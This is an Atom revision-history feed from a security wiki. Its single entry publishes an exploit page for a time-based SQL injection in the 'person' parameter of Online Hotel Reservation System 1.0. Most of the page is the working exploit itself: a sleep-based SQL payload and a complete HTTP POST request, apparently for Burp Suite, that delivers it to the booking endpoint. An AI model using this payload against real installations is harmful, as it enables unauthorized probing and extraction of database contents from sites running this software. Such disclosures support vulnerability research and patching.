<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Online_Hotel_Reservation_System_1.0_%E5%9F%BA%E6%96%BC%E6%99%82%E9%96%93%E7%9A%84SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>Online Hotel Reservation System 1.0 基於時間的SQL注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Online_Hotel_Reservation_System_1.0_%E5%9F%BA%E6%96%BC%E6%99%82%E9%96%93%E7%9A%84SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Online_Hotel_Reservation_System_1.0_%E5%9F%BA%E6%96%BC%E6%99%82%E9%96%93%E7%9A%84SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-21T01:42:00Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Online_Hotel_Reservation_System_1.0_%E5%9F%BA%E6%96%BC%E6%99%82%E9%96%93%E7%9A%84SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=1270&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection # Exploit Author: Mesut Cetin # Date: 2021-01-15 # Vendor Homepage: http...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Online_Hotel_Reservation_System_1.0_%E5%9F%BA%E6%96%BC%E6%99%82%E9%96%93%E7%9A%84SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=1270&amp;oldid=prev"/>
		<updated>2021-04-08T09:44:01Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Online Hotel Reservation System 1.0 - &amp;#039;person&amp;#039; time-based SQL Injection # Exploit Author: Mesut Cetin # Date: 2021-01-15 # Vendor Homepage: http...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection&lt;br /&gt;
# Exploit Author: Mesut Cetin&lt;br /&gt;
# Date: 2021-01-15&lt;br /&gt;
# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html&lt;br /&gt;
# Software Link: https://www.sourcecodester.com/download-code?nid=13492&amp;amp;title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0&lt;br /&gt;
&lt;br /&gt;
######## Description ########&lt;br /&gt;
&lt;br /&gt;
The 'person' parameter is vulnerable to time-based SQL Injection. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
######## Proof of Concept #######&lt;br /&gt;
&lt;br /&gt;
Payload: (select*from(select(sleep(10)))a)&lt;br /&gt;
&lt;br /&gt;
Using Burp Suite, send the following POST request:&lt;br /&gt;
&lt;br /&gt;
POST /marimar/index.php?p=booking HTTP/1.1&lt;br /&gt;
Host: localhost&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&lt;br /&gt;
Accept-Language: de,en-US;q=0.7,en;q=0.3&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
Content-Length: 71&lt;br /&gt;
Origin: http://localhost&lt;br /&gt;
Connection: close&lt;br /&gt;
Referer: http://localhost/marimar/index.php?p=booking&lt;br /&gt;
Cookie: PHPSESSID=cf40af0022f401c8cfd0be17fc00a6cc&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
&lt;br /&gt;
arrival=01%2F19%2F2021&amp;amp;departure=01%2F11%2F2021&amp;amp;person=(select*from(select(sleep(10)))a)&amp;amp;accomodation=0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>